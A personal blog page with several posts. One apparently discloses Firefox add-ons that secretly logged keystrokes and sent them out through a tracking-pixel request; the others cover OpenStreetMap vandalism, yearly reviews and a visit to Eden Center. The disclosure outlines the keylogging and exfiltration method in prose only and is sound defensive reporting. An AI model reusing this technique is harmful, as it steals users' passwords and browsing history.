Minh’s Notes

Under Construction

I am working diligently to put a nicer-looking look and feel to this website and a more streamlined system of managing it. Please bear with me; as I can only do this during my free time, this effort will take a long time.

Speaking of construction, here’s a prehistoric under construction page for my now-defunct LSP Online.


In the meantime…

I spy a spy

Sunday, September 16, 2018 — Recently, I discovered that the author of several Firefox add-ons has turned some of them into spyware designed to steal passwords from unsuspecting users. This post details the classic man-in-the-browser Trojan horse attack to raise awareness about shortcomings in Firefox’s WebExtensions API and the process for approving add-ons for distribution via the Firefox Add-ons website.

A gift for Troy

A year ago, Mozilla eliminated the so-called “legacy” extension platform in favor of a new WebExtensions API largely copied from Google Chrome’s extension API. This caused my AVIM extension to become incompatible with Firefox 57 and above, inconveniencing many Vietnamese-speaking Firefox users who depended on it to browse and communicate in their native language. I remain committed to eventually rewriting AVIM as a WebExtension, but there are significant technical hurdles.

In the meantime, two developers took advantage of the void left by AVIM. One created an extension that opens their homepage, from which they served ads alongside a download link for someone else’s desktop-based IME. Another, a self-described cybersecurity practitioner who goes by “domdomrung”, ported several add-ons from Google Chrome to Firefox, including a rudimentary “Vietnamese Input Method” extension. Both authors’ extensions had a blatant SEO character, but that in itself didn’t violate Mozilla’s add-on policies on security and privacy.

Vietnamese Input MethodSafeKids
Vietnamese Input Method (left) and SafeKids (right) on the Firefox Add-ons website

In April, domdomrung published a minor update to Vietnamese Input Method that automatically went out to existing users. The previous month, domdomrung had also updated a “SafeKids” extension that ostensibly provided child monitoring functionality. Buried within both updates were five lines of malicious code that logs users’ keystrokes and sends them to domdomrung’s website. Specifically, the code injects a script onto every webpage that logged each keystroke on any webpage to local storage. Every 3.6 seconds or upon pressing the Enter or Return key, if at least five characters had been typed, the script loads a tracking pixel from domdomrung’s domain, blog.mybloggertricks.org, using an Image constructor.

The putative image’s URL includes the typed characters and the current webpage’s URL. The resource at this URL is not an image but rather an HTML document that redirects to Google. Nonetheless, like any tracking pixel, merely accessing the URL is enough to populate the server logs with the payload. In this case, the payload includes a full browsing history and is very likely to include user names and passwords.

Surprise

Mozilla’s add-on policy requires every add-on to “disclose how the add-on collects, uses, stores and shares user data in the privacy policy” and “expects that the add-on limits data collection whenever possible”. Vietnamese Input Method had no privacy policy. Collecting keystrokes in this way provides no obvious user benefit. It’s impossible to know what domdomrung is doing with the data, but it isn’t difficult to imagine the data being used for nefarious purposes. (Some popular input method extensions do send keystrokes to a server but justify it as a necessary step for predictive suggestions. Such extensions do raise security and privacy concerns but are not necessarily malicious.)

SafeKids privacy policy
Vietnamese Input Method (left) and The SafeKids extension’s privacy policy says one thing in English to get by the review process and another thing in Vietnamese to attract downloads.

Meanwhile, SafeKids has a bilingual privacy policy that attempts to justify keylogging as a legitimate function that gives parents control over their children’s browsing behavior. Parenting questions aside, it’s worth noting that only the English portion of the privacy policy says, “I and mozilla cant not view your log” [sic]. That statement can’t not be true, given how the extension phones home with browsing histories and keystrokes. Similar language is nowhere to be found in the Vietnamese portion of the privacy policy. I suspect domdomrung used this statement to deceive Mozilla Add-ons reviewers who speak English but not Vietnamese. It worked.

A bug in SafeKids makes it possible to identify at least two victims of this extension. The add-on aggressively added the keylogging script to every HTML document, failing to distinguish ordinary webpages from HTML documents serving as rich text editors, which are popular on forums. As a result, the malicious code is present verbatim in forum posts and elsewhere. Where possible, I have notified these individuals of the need to uninstall the malicious add-ons.

In July, a Firefox user left a review complaining about Vietnamese Input Method’s keylogging behavior. However, the add-on remained available for download. On September 1st, I discovered this add-on and reported it to Mozilla, and they removed it a couple days later. However, they haven’t added it to the blocklist, so users who have installed this extension continue to suffer this breach of privacy. On September 9th, I also reported SafeKids to Mozilla. It remains available for download.

Vietnamese Input Method reviews
I wasn’t the first to notice the malicious behavior in Vietnamese Input Method.

On September 16th, I filed Bugzilla bugs 1,491,716 and 1,491,717 to add Vietnamese Input Method and SafeKids to the blocklist, which will quickly disable any existing installations. I urge Mozilla to act promptly to delete SafeKids and blocklist both add-ons.

Prevention and preemption

This incident underscores the privacy risk posed by keyboarding software and undermines Mozilla’s claim that WebExtensions is inherently more secure than the legacy add-on platform that it replaced. Granted, with WebExtensions, a security vulnerability such as AVIM’s 2009 eval() bug can’t as easily escalate into a full-blown attack on the local machine. Still, as long as an extension has access to the keyboard and the network simultaneously, it’s all too easy for an unscrupulous add-on author to steal personal information en masse. The irony isn’t lost on me that my own subsequent efforts to keep AVIM secure through sandboxing frequently drew scrutiny from reviewers, scrutiny that these add-ons clearly didn’t receive.

Mozilla should audit existing add-ons for undeclared tracking pixel usage and reimpose a human review process for add-on updates, just as there was before WebExtensions. A human review process can help ensure that add-on developers aren’t using “clean” first versions as cover for future malicious updates. As it is, WebExtensions and the Firefox Add-ons website give users a false sense of security.

Beyond additional scrutiny, WebExtensions needs a dedicated, secure input method API. Such an API would isolate input method logic in an environment that lacks access to the network or indeed the rest of the webpage. Network access for predictive input methods could require a separate privilege. Ideally, an input method API would work throughout the browser, including in the search bar, as AVIM does. The lack of this functionality is a frequent complaint among users of Google Chrome’s input method extensions, including Google Input Tools and AVIM “lite”.

There is clearly a need for browser-based input method editors, as seen in the former popularity of AVIM for Firefox and the continuing popularity of input method extensions for Chrome. As Mozilla eliminates what’s left of legacy extensions, users shouldn’t have to forego their privacy in order to communicate in their own language. An add-on platform that facilitates legitimate extensions such as AVIM can keep malicious add-on authors from taking advantage of these users.

✉ 0 Comments

Big Apple, bad apples

Tuesday, September 04, 2018 — Give them an inch and they’ll take a mile. For all the good that can come of the “Edit” button on open content sites like Wikipedia and OpenStreetMap – disseminating knowledge, giving a voice to marginalized communities, facilitating humanitarian initiatives – anyone deeply involved with such projects can tell you it all just barely works. It’s a daily miracle that the projects haven’t collapsed under the weight of graffiti, spam, and outright lies. To hear it from countless educators, Wikipedia simply can’t be trusted.

On Thursday, Mapbox and its customers fell victim to very prominent vandalism in OpenStreetMap, in which the label for New York City got renamed to something juvenile and offensive. A few weeks earlier, Wikimedia Maps was also affected by the same act of vandalism, which included numerous slurs, frustrating Wikipedia administrators who felt that OpenStreetMap doesn’t have its act together. Both episodes were painful for me to witness, as a longtime proponent of collaboration between the Wikipedia and OpenStreetMap communities and, obviously, as a Mapbox employee. In the days since, there’s been quite a bit of discussion in the OpenStreetMap U.S. Slack workspace about how OpenStreetMap and the consumers of its data could better prevent or mitigate such attacks. Even someone seeking credit for the attack has joined in with suggestions for improving “security”. True to form, there have been renewed calls for Wikipedia-style article protection or Google Maps–style moderation. But either approach is a poor fit for an open project built on geographic data.

Nevv York
Is it a feature or a bug that the New York City node can be so easily modified? If not for the project’s openness, it’s unlikely that this city’s name would have been translated into so many languages and that the surrounding neighborhood would have gained so much detail.

A Wikipedia article can be protected, disabling the “Edit” button for everyone except administrators, quite effectively preventing it from being vandalized. But what would the equivalent be on OpenStreetMap? Protecting a single feature, such as the New York City node, would only invite a vandal to place an asinine node right next to it. (On Wikipedia, you can create a “Nevv York City” article full of junk, but nothing would ever link to it, so the impact would be minimal.) Protecting the area around the New York City node, meanwhile, would deprive that city’s residents of the ability to contribute local knowledge to the project. OpenStreetMap is still incomplete enough that we can’t afford to lock down any portion of the map, not least a fast-changing city full of potential contributors.

The Wikipedia community has always viewed article protection as a public admission of failure, only to be used as a last resort. Given that the project’s slogan is “an encyclopedia that anyone can edit”, why should so many important articles be permanently closed to editing? Wikipedia has tried to replace after-the-fact countervandalism with several different moderation systems. The most recent was finally adopted by the German Wikipedia but was only adopted on a limited basis on a handful of articles at the English Wikipedia. Meanwhile, countless pages remain permanently protected. To say that moderation hasn’t taken off is quite an understatement.

What’s more, instituting a peer review process for OpenStreetMap would entail more than just flipping a switch. While verifying a Wikipedia edit might entail spot-checking cited sources, OpenStreetMap prizes unpublished local knowledge, so to truly review changes and stave off hoaxes could in many cases require in-person visits. Google Maps and Foursquare, two commercial, crowdsourced mapping projects, actively recruit locals to spend all their time curating and groundtruthing, yet they still suffer from rampant vandalism. OpenStreetMap already encourages groundtruthing, but any hard requirement along those lines would either be roundly ignored or lead to the immediate death of the project.

To be sure, there’s more to countervandalism than locking things down. The vandalism that propagated to Wikimedia Maps, then Mapbox, lasted less than two hours on OpenStreetMap before the community reverted the changes and banned the vandal’s user account. Mapbox has deployed increasingly sophisticated tools, including machine learning, for automatically detecting and blocking vandalism that does make it past the OpenStreetMap community. Wikipedia has done much the same for its content to good effect, which is why its administrators found it so frustrating that vandalism would still work its way in via embedded maps.

Last week’s incident was an exception, proving the adage that an adversary only has to get lucky once. That style of vandalism would probably have been caught by Wikipedia’s extensive system of blacklists and abuse filters, which prevent vandals from even saving blatantly bad edits. But a persistent vandal – this one used JOSM, the OpenStreetMap editor so advanced I steer clear of it – will eventually find a way around any blacklist or filter. And if the goal is to reduce the amount of time that a vandal’s work remains on the site, then any solution will also have the undesired effect of helping the vandal learn new tricks faster, like a virus that evolves more rapidly in a Petri dish.

For my part, I think the OpenStreetMap ecosystem places far too much emphasis on bad actions while doing very little to identify and block bad actors. As a Wikipedia administrator for the last 15 years, I’ve seen firsthand the lengths that people will go to evade content-based countervandalism. If you do battle long enough with a persistent vandal, it’s only a matter of time before well-meaning contributors give up due to the inconvenience of avoiding benign words and any article of interest. You can maintain the project’s health much more effectively by targeting the malicious individual.

At any given time, a bewildering number of IP addresses and IP address ranges are blocked from editing either temporarily or permanently. Open proxies are blocked on sight. There are even tools for ferreting out sockpuppets and sleeper accounts and blocking them proactively, along with rigorous accountability to prevent administrators from abusing ordinary users’ privacy. OpenStreetMap needs to adopt similar antiabuse tools based on user identities, if it is to have any hope against the hoards of script kiddies that now realize the map is subject to vandalism.

But more than any technical solution, the best approach I’ve found to fighting vandalism requires no software changes at all. OpenStreetMap needs to double down on building the most jaw-droppingly detailed map imaginable. At Wikipedia, articles on uncontroversial subjects suffer from less frequent vandalism as they develop from stubs into detailed articles. You’d think a more complete encyclopedia article would give the vandals more to tear apart, but in fact the opposite is true. I see this trend most clearly with articles about high schools, a favorite target of vain and profane adolescents:

High school article vandalism, September 2017–2018
This chart suggests that the most frequently vandalized Wikipedia articles about high schools are stub articles (up to around a thousand words) as opposed to more fully developed articles. Specifically, the chart counts the number of times an abuse filter was triggered within the past year, normalized by the number of page views during that time period (to account for some schools being more well-known than others). The abuse filter doesn’t track every instance of vandalism that occurs on the article; even better, it tracks edits that the wiki blocks outright, as well as those that the wiki flags for human review. I chose a time period of one year because vandalism of school articles waxes and wanes according to the school calendar.

A school article tends to be vandalized by two groups of people: the school’s own students and those of the school’s sports rivals. I suspect the former group is far less likely to vandalize an article that represents their school surprisingly well. I’m unsure why the rival schools’ students also tend to leave the article alone, but I wonder if it’s because the article’s length and detail makes it look like less of a toy to be kicked around. Maybe an article or a map needs a critical mass of credibility to stave off these acts of immaturity. If so, that’s good news for OpenStreetMap, because so many of the community’s efforts – importing building footprints, adding turn lanes and speed limits, refining the cartography of popular map renderers – are primarily about parity with user expectations and thus about building trust with the user.

OpenStreetMap would do well to ignore calls to indiscriminately lock down content or lock out good-faith contributors. Technical barriers to entry are never a sound way to grow a community-oriented project. Instead, with a modicum of well-considered, identity-based antiabuse measures, the project’s contributors can go about their business, drowning out the vandals that already make too much of their dumb luck.

✉ 0 Comments

Minutes from the last minutes of 2017

Sunday, December 31, 20172016 paved the way for a 2017 that took me in a couple new directions but mostly fell along the same themes.

This summer, I traveled to the Wikimania conference in Montréal to continue promoting closer ties between the Wikimedia and OpenStreetMap movements. There’s a long road ahead, but tight coordination between the projects is feeling more inevitable now than it did back in 2015.

Mapbox also sent me to State of the Map U.S. in Boulder to make the case that OpenStreetMap needs a mobile software ecosystem to stay relevant. I’m still busy crafting that OSM-powered map library for iOS. But business needs sent me on a detour building a turn-by-turn navigation library to complement it. Well I love detours, or longcuts, as I remind myself after forgetting to make that left turn for the dozenth time. Maybe I need a smartphone after all.

Then again, I love the fact that I can be an unabashed roadgeek and get paid for it. The U.S. road system is fantastically idiosyncratic, so the state of the art in navigation software falls quite short still. My typical hobbyist obsession with route shields and the like can ultimately benefit the motoring public through better software.

When it comes to navigation, my job formal qualifications amount to riding shotgun on the hour-long bus ride home from school – lest I get motion sickness – plus navigating from the backseat during road trips, keeping one eye on the radar detector and the other on the Watchman. But if nothing else, those experiences help me counter the Calicentrism that shows up in surprising ways in this field.

Speaking of California, OpenStreetMap’s coverage of San José is really looking up these days. As I briefly mentioned in Boulder, our coverage of points of interest is beginning to rival more established sources. To prove it, I manually counted the entries of the local phone book, thereby cementing my reputation among Mapboxers as a phone geek.

Mozilla finally killed off support for the extension platform that made Firefox a household name and kept the browser relevant during all these years of Chrome hegemony. Mozilla couched it as a speed boost, but Vietnamese speakers quickly discovered my keyboarding extension, AVIM, among the casualty list. They really have no good alternative for writing in their language. Hopefully I’ll be able to revive AVIM atop Firefox’s new extension architecture (really, Chrome’s) in the new year. It’ll involve some lobbying and mucking around in Firefox internals, which is a road I didn’t anticipate taking when I took over that extension a decade ago.

Another hobby of mine succumbed to technical debt this year: the blog you’re reading. It’s hobbling along again, thanks to a last-minute upgrade. But it’s only a matter of time before I have to move it off Movable Type. It’s been a solid 15 years or so.

Time flies. I flew a bit this year too, but not enough to shake the roadgeek out of me.

✉ 0 Comments

Finding Wilson Boulevard

Sunday, May 21, 2017 — An overflowing bánh mì, a tray of tender bánh da lợn, a can of soybean milk: my treat after every monthly trip to the little Vietnamese grocery across town. Mekong Market was my Sunday Bible school of Vietnamese culture in a childhood as distant from Asia as one could imagine, in Cincinnati. Snacks, sauces, and canned foods defying translation lined the shelves; in the refrigerator, a variety of mystery meats wrapped in aluminum foil each bore the same place of origin: Chicago.

One Labor Day, my family made a trip up to Chicago to finally see the bustling Vietnamese community whose clearance we had happily bought for years. We made a lot of road trips back then, often just spur-of-the-moment driving through the peaceful countryside. But since we were headed five hours away to an unfamiliar city, we needed to plan ahead. As the resident map enthusiast, I was to find directions to the Vietnamese supermarket in Chicago using our new Internet connection. We’d enjoy some phở for lunch and bring back enough fresh ingredients to avoid Mekong Market for a little while.

A search for “Vietnamese markets in Chicago” on AltaVista turned up an article from The Washingtonian describing a cluster of supermarkets, phở restaurants, and bakeries on Wilson Boulevard. I pasted the street address into MapQuest, specified “Chicago” and “Illinois” to make sure I got the right “Wilson”, and printed out the directions. (As one did back in those days: in the car, we kept a radar detector where a phone or GPS unit would normally be holstered today.)

Bánh mì thịt nguội
A Vietnamese cold cuts sandwich (bánh mì thịt nguội).

Five hours later, we arrived in Chicago and crawled up and down Wilson Avenue. If a Vietnamese supermarket or two were to be found along this street, it couldn’t have fit very easily inside any of the modest townhouses that lined the street from end to end without interruption. I noticed, too, that the entire length of the street was numbered in the 8000 range, as opposed to the 6700 block on which this supermarket supposedly stood. My father pulled the car aside and called the supermarket’s phone number on his cell phone. I could understand just enough Vietnamese to make out the voice on the other end: “I’m in Northern Virginia – what in the world do you want me to do for you?”

As my father held his tongue – Grandma was in the back seat – we wandered aimlessly around that part of town until we happened to spot some Vietnamese signage. There, just a few minutes away from Wilson Avenue, were the supermarket, phở restaurant, and bakery we had been hoping for, by sheer luck.


In the years since, I moved to San José, California, home to one of the largest populations of Vietnamese Americans in the country. Bánh mì shops here are as commonplace as cafés. In fact, the only reason I ever notice them is that I also became immersed in OpenStreetMap, an online project that draws maps the way Wikipedia writes an encyclopedia. I found a niche mapping “flyover country” and made it my mission to improve coverage of communities underserved by commercial map vendors, among them ethnic enclaves in San José, Orange County, and elsewhere.

Last month, I happened to be in Washington, D.C., and, on a lark, decided to visit Wilson Boulevard for real. It had been almost eighteen years since my last attempt, but despite having since moved to a city with a large Vietnamese population and plenty of Vietnamese food, I figured seeing this street in person would give me some closure. Fortunately, the same Metro line that took me almost to the airport also took me almost to Eden Center, the Vietnamese shopping center that had teased me back in grade school.

Parking aisles
No Vietnamese shopping center would be complete without a kitschy gate.

I had always imagined Eden Center to be more of a bazaar than a strip mall. Nonetheless, it has almost everything you’d expect from a center of Vietnamese social life: a dearth of parking, a man singing karaoke to an impromptu crowd out front, a father treating his daughters to the kumquats that hang from a decorative tree nearby. On the other hand, there are no elderly men playing cờ tướng in front of the shops, as one often finds in California. (One wall bears an enormous warning against gambling and suggests area casinos as alternatives.)

Like similar centers in Orange County, Eden Center is steeped in war history. Each aisle in the parking lot bears the name of a South Vietnamese general.

Parking aisles
At the intersection of Nguyễn Khoa Nam and Trần Văn Bá “Avenues”.

The South Vietnamese flag flies proudly beside the American flag. As it was the week before the anniversary of the Fall of Saigon, a banner spanning the two flagpoles honored South Vietnamese war heroes.

South Vietnamese heroes banner
The banner reads, Thành Kính Tri Ân Anh Hùng Tử Sĩ Việt Nam Cộng Hòa Vị Quốc Vong Thân (“With Gratitude We Revere the Martyred National Heroes of the Republic of Vietnam”).

I thoroughly field-surveyed Eden Center for OpenStreetMap, noting the restaurants, jewelers, beauty salons, travel agencies, and karaoke bars tucked away in the center’s “mini-malls”. Before leaving, I bought a bánh mì, a piping hot tray of bánh da lợn, and a can of soybean milk for the road.


The whole reason I got involved with “citizen mapping” is that proprietary map sources – the ones we take for granted as being complete, accurate, and up-to-date – actually fall so short when it comes to places beyond San Francisco, beyond the central business districts, beyond the tourist traps.

Eden Center on Apple Maps
Apple Maps includes only a few shops, but they’re all in the wrong places and some are no longer open.

Eden Center on Google Maps
With the same indoor mapping style it applies to every mall, Google Maps makes it look like it has spectacular coverage of Eden Center. But it’s just walls: most of the shops are still in the wrong location and some have closed.

Eden Center on Baidu Maps
I found it surprising that Baidu Maps has coverage of this area on par with Apple Maps, but it too has misplaced and outdated points of interest.

OpenStreetMap didn’t have a lot of detail about Eden Center until I ventured there last month, but now it’s complete, accurate, and up-to-date. Even the parking aisles are named.

Eden Center on OpenStreetMap, before and after
After my visit to Eden Center, OpenStreetMap gained so much detail in the area that there isn’t enough room to display most of the points of interest with proper icons and labels. (Left: before; right: after)

Eden mini-malls on OpenStreetMap, before and after
(Top: before; bottom: after)

Eden Mini Mall on OpenStreetMap, full detail
One of OpenStreetMap’s advantages as a human-curated map database is an attention to detail. The abundance of diacritical marks in Vietnamese are essential to comprehension, so this Vietnamese-American community will find it helpful that OSM includes the diacritics, even though this shopping center is located in a predominantly English-speaking city.

OpenStreetMap may have a long way to go before it can even dream of breaking people’s Google habits. But for now, I’m happy to have finally made it to Wilson Boulevard and made it easier for others to do the same – minus the detour.

✉ 1 Comments

Minutes from the last minutes of 2016

Saturday, December 31, 2016 — It feels wrong to leave my blog hanging on such a brief note about new employment, especially now that I no longer have to keep nearly as many secrets about what I do in front of the computer screen. A blog post authored on December 31st is all but guaranteed to be a year in review. But I’ve procrastinated on updating this blog for well over a year, so you’ll get more than you bargained for.

As my last post suggests, I’ve been preoccupied with maps all this time. Specifically, I’ve been developing an iOS Cocoa Touch library for utterly customizable maps with an incredibly creative team. It wasn’t my intention to delve into iOS development after leaving the Cupertino orchard. After all, I had only started using a smartphone a few months prior. It was only a matter of time before I gave into temptation and ported the library to macOS. Now I have an excuse to write AppleScript!

To me, the most important feature of these map libraries is that they’re based on OpenStreetMap data. Libraries like Mapbox’s are a conduit for the OSM community’s unparalleled, mostly labor-of-love mapping to find their way into the lives of ordinary folks who don’t obsess over maps. I have a lot more to say about why OSM matters, but it would take this post far into manifesto territory, so that’ll have to wait until next year.

Last year, I got an opportunity to share ideas for nurturing the OSM community at, of all places, the United Nations headquarters in New York. It was my first time I’d ever spoken at a conference – I guess it showed. The conference scene also took me to Mexico City and San Diego, where I introduced a small sliver of the Wikimedia community to OSM and its community. The Wikimedia and OSM projects are drawing much closer together, and we’ll finally start to see some of the concrete benefits of that relationship in the new year.

AVIM, my Vietnamese input method extension for Firefox, gained some long-needed features this year, like support for multisyllabic loan words. But the future of that beautiful extension is in doubt, because Mozilla is dead-set on sunsetting the only browser extension platform that’s more than a toy. It’s a pity; the end of AVIM in Firefox will chip away at Vietnamese speakers’ ability to use their native language as a first-class citizen on the Web.

So it’s with mixed feelings that I careen into 2017, but only because 2015–16 was so swell. I’m sure you’re already looking forward to my next last-minute update in approximately one year.

✉ 0 Comments


Top of Page | Back to MingerWeb | Archives (Older, Even Older, Still Older) | Copyright © 2002–2018 Minh Nguyen.